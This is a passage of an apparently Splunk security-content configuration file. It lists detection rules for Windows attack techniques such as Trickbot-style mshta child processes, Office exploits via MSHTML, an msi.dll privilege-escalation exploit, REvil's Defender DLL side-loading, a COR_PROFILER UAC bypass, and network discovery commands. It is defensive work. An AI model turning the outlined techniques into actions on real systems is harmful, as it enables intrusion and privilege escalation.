user,dest action.notable.param.rule_description = This search is to detect a suspicious mshta.exe process that spawn rundll32 or regsvr32 child process. This technique was seen in several malware nowadays like trickbot to load its initial .dll stage loader to execute and download the the actual trickbot payload. action.notable.param.rule_title = Mshta spawning Rundll32 OR Regsvr32 Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name = "mshta.exe" `process_rundll32` OR `process_regsvr32` by Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `mshta_spawning_rundll32_or_regsvr32_process_filter` [ESCU - MSHTML Module Load in Office Product - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies the module load of mshtml.dll into an Office product. This behavior has been related to CVE-2021-40444, whereas the malicious document will load ActiveX, which activates the MSHTML component. The vulnerability resides in the MSHTML component. During triage, identify parallel processes and capture any file modifications for analysis. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following detection identifies the module load of mshtml.dll into an Office product. This behavior has been related to CVE-2021-40444, whereas the malicious document will load ActiveX, which activates the MSHTML component. The vulnerability resides in the MSHTML component. During triage, identify parallel processes and capture any file modifications for analysis. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process names and image loads from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Limited false positives will be present, however, tune as necessary. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - MSHTML Module Load in Office Product - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ loading mshtml.dll. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MSHTML Module Load in Office Product - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies the module load of mshtml.dll into an Office product. This behavior has been related to CVE-2021-40444, whereas the malicious document will load ActiveX, which activates the MSHTML component. The vulnerability resides in the MSHTML component. During triage, identify parallel processes and capture any file modifications for analysis. action.notable.param.rule_title = MSHTML Module Load in Office Product action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=7 parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe", "msaccess.exe","Graph.exe","winproj.exe") ImageLoaded IN ("*\\mshtml.dll", "*\\Microsoft.mshtml.dll","*\\IE.Interop.MSHTML.dll","*\\MshtmlDac.dll","*\\MshtmlDed.dll","*\\MshtmlDer.dll") | stats count min(_time) as firstTime max(_time) as lastTime by dest, process_name, ImageLoaded, OriginalFileName, ProcessGuid | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mshtml_module_load_in_office_product_filter` [ESCU - MSI Module Loaded by Non-System Binary - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic identifies `msi.dll` being loaded by a binary not located in `system32`, `syswow64`, `winsxs` or `windows` paths. This behavior is most recently related to InstallerFileTakeOver, or CVE-2021-41379, and DLL side-loading. CVE-2021-41379 requires a binary to be dropped and `msi.dll` to be loaded by it. To Successful exploitation of this issue happens in four parts \ 1. Generation of an MSI that will trigger bad behavior. \ 1. Preparing a directory for MSI installation. \ 1. Inducing an error state. \ 1. Racing to introduce a junction and a symlink to trick msiexec.exe to modify the attacker specified file. \ In addition, `msi.dll` has been abused in DLL side-loading attacks by being loaded by non-system binaries. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.002", "T1574"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic identifies `msi.dll` being loaded by a binary not located in `system32`, `syswow64`, `winsxs` or `windows` paths. This behavior is most recently related to InstallerFileTakeOver, or CVE-2021-41379, and DLL side-loading. CVE-2021-41379 requires a binary to be dropped and `msi.dll` to be loaded by it. To Successful exploitation of this issue happens in four parts \ 1. Generation of an MSI that will trigger bad behavior. \ 1. Preparing a directory for MSI installation. \ 1. Inducing an error state. \ 1. Racing to introduce a junction and a symlink to trick msiexec.exe to modify the attacker specified file. \ In addition, `msi.dll` has been abused in DLL side-loading attacks by being loaded by non-system binaries. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and imageloaded executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = It is possible some Administrative utilities will load msi.dll outside of normal system paths, filter as needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - MSI Module Loaded by Non-System Binary - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MSI Module Loaded by Non-System Binary - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-41379"], "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.002", "T1574"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded="*\\msi.dll" NOT (Image IN ("*\\System32\\*","*\\syswow64\\*","*\\windows\\*", "*\\winsxs\\*")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name dest EventCode ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `msi_module_loaded_by_non_system_binary_filter` [ESCU - Msmpeng Application DLL Side Loading - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious creation of msmpeng.exe or mpsvc.dll in non default windows defender folder. This technique was seen with revil ransomware in Kaseya Supply chain. The approach is to drop an old version of msmpeng.exe to load the actual payload name as mspvc.dll which will load the revil ransomware to the compromise machine action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.002", "T1574"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious creation of msmpeng.exe or mpsvc.dll in non default windows defender folder. This technique was seen with revil ransomware in Kaseya Supply chain. The approach is to drop an old version of msmpeng.exe to load the actual payload name as mspvc.dll which will load the revil ransomware to the compromise machine action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the Filesystem responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. action.escu.known_false_positives = quite minimal false positive expected. action.escu.creation_date = 2023-03-15 action.escu.modification_date = 2023-03-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Msmpeng Application DLL Side Loading - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware"] action.risk = 1 action.risk.param._risk_message = Suspicious creation of msmpeng.exe or mpsvc.dll in non default windows defender folder on host - $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Msmpeng Application DLL Side Loading - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.002", "T1574"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious creation of msmpeng.exe or mpsvc.dll in non default windows defender folder. This technique was seen with revil ransomware in Kaseya Supply chain. The approach is to drop an old version of msmpeng.exe to load the actual payload name as mspvc.dll which will load the revil ransomware to the compromise machine action.notable.param.rule_title = Msmpeng Application DLL Side Loading action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = |tstats `security_content_summariesonly` values(Filesystem.file_path) as file_path count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name = "msmpeng.exe" OR Filesystem.file_name = "mpsvc.dll") AND NOT (Filesystem.file_path IN ("*\\Program Files\\windows defender\\*","*\\WinSxS\\*defender-service*","*\\WinSxS\\Temp\\*defender-service*")) by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.user Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `msmpeng_application_dll_side_loading_filter` [ESCU - Net Localgroup Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic will identify the use of localgroup discovery using `net localgroup`. During triage, review parallel processes and identify any further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic will identify the use of localgroup discovery using `net localgroup`. During triage, review parallel processes and identify any further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Net Localgroup Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "IcedID", "Windows Discovery Techniques", "Windows Post-Exploitation", "Azorult", "Active Directory Discovery", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Net Localgroup Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "IcedID", "Windows Discovery Techniques", "Windows Post-Exploitation", "Azorult", "Active Directory Discovery", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=net.exe OR Processes.process_name=net1.exe (Processes.process="*localgroup*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `net_localgroup_discovery_filter` [ESCU - NET Profiler UAC bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect modification of registry to bypass UAC windows feature. This technique is to add a payload dll path on .NET COR file path that will be loaded by mmc.exe as soon it was executed. This detection rely on monitoring the registry key and values in the detection area. It may happened that windows update some dll related to mmc.exe and add dll path in this registry. In this case filtering is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect modification of registry to bypass UAC windows feature. This technique is to add a payload dll path on .NET COR file path that will be loaded by mmc.exe as soon it was executed. This detection rely on monitoring the registry key and values in the detection area. It may happened that windows update some dll related to mmc.exe and add dll path in this registry. In this case filtering is needed. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Registry` node. Also make sure that this registry was included in your config files ex. sysmon config to be monitored. action.escu.known_false_positives = limited false positive. It may trigger by some windows update that will modify this registry. action.escu.creation_date = 2022-02-18 action.escu.modification_date = 2022-02-18 action.escu.confidence = high action.escu.full_search_name = ESCU - NET Profiler UAC bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = Suspicious modification of registry $registry_path$ with possible payload path $registry_path$ and key $registry_key_name$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - NET Profiler UAC bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect modification of registry to bypass UAC windows feature. This technique is to add a payload dll path on .NET COR file path that will be loaded by mmc.exe as soon it was executed. This detection rely on monitoring the registry key and values in the detection area. It may happened that windows update some dll related to mmc.exe and add dll path in this registry. In this case filtering is needed. action.notable.param.rule_title = NET Profiler UAC bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_path= "*\\Environment\\COR_PROFILER_PATH" Registry.registry_value_data = "*.dll" by Registry.registry_path Registry.registry_key_name Registry.registry_value_data Registry.dest | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `net_profiler_uac_bypass_filter` [ESCU - Network Connection Discovery With Arp - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `arp.exe` utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use arp.exe for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `arp.exe` utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use arp.exe for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-10 action.escu.modification_date = 2021-09-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Network Connection Discovery With Arp - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Qakbot", "Windows Post-Exploitation", "Prestige Ransomware", "Volt Typhoon", "IcedID"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Network Connection Discovery With Arp - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Qakbot", "Windows Post-Exploitation", "Prestige Ransomware", "Volt Typhoon", "IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="arp.exe") (Processes.process=*-a*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_connection_discovery_with_arp_filter` [ESCU - Network Connection Discovery With Net - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` with command-line arguments utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use net.exe for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` with command-line arguments utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use net.exe for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-10 action.escu.modification_date = 2021-09-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Network Connection Discovery With Net - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Azorult", "Windows Post-Exploitation", "Prestige Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Network Connection Discovery With Net - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Azorult", "Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") (Processes.process=*use*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_connection_discovery_with_net_filter` [ESCU - Network Connection Discovery With Netstat - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `netstat.exe` with command-line arguments utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use netstat.exe for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `netstat.exe` with command-line arguments utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use netstat.exe for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Network Connection Discovery With Netstat - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Volt Typhoon", "Active Directory Discovery", "Prestige Ransomware", "Windows Post-Exploitation", "Qakbot", "CISA AA22-277A", "CISA AA23-347A", "PlugX"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Network Connection Discovery With Netstat - Rule action.correlationsearch.annotations = {"analytic_story": ["Volt Typhoon", "Active Directory Discovery", "Prestige Ransomware", "Windows Post-Exploitation", "Qakbot", "CISA AA22-277A", "CISA AA23-347A", "PlugX"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="netstat.exe") (Processes.process=*-a*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_connection_discovery_with_netstat_filter` [ESCU - Network Discovery Using Route Windows App - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic look for a spawned process of route.exe windows application. Adversaries and red teams alike abuse this application the recon or do a network discovery on a target host. but one possible false positive might be an automated tool used by a system administator or a powershell script in amazon ec2 config services. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016", "T1016.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic look for a spawned process of route.exe windows application. Adversaries and red teams alike abuse this application the recon or do a network discovery on a target host. but one possible false positive might be an automated tool used by a system administator or a powershell script in amazon ec2 config services. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A network operator or systems administrator may utilize an automated host discovery application that may generate false positives or an amazon ec2 script that uses this application. Filter as needed. action.escu.creation_date = 2024-02-14 action.escu.modification_date = 2024-02-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Network Discovery Using Route Windows App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Qakbot", "CISA AA22-277A", "Windows Post-Exploitation", "Prestige Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Network Discovery Using Route Windows App - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Qakbot", "CISA AA22-277A", "Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016", "T1016.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_route` by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_discovery_using_route_windows_app_filter` [ESCU - Network Share Discovery Via Dir Command - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies object access on Windows administrative SMB shares (Admin$, IPC$, C$). This represents suspicious behavior as its commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The IcedID malware family also implements this behavior to try to infect other machines in the infected network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1135"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies object access on Windows administrative SMB shares (Admin$, IPC$, C$). This represents suspicious behavior as its commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The IcedID malware family also implements this behavior to try to infect other machines in the infected network. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 5140 EventCode enabled. The Windows TA is also required. Also enable the object Audit access success/failure in your group policy. action.escu.known_false_positives = System Administrators may use looks like net.exe or "dir commandline" for troubleshooting or administrations tasks. However, this will typically come only from certain users and certain systems that can be added to an allow list. action.escu.creation_date = 2023-05-23 action.escu.modification_date = 2023-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Network Share Discovery Via Dir Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["IcedID"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Network Share Discovery Via Dir Command - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, 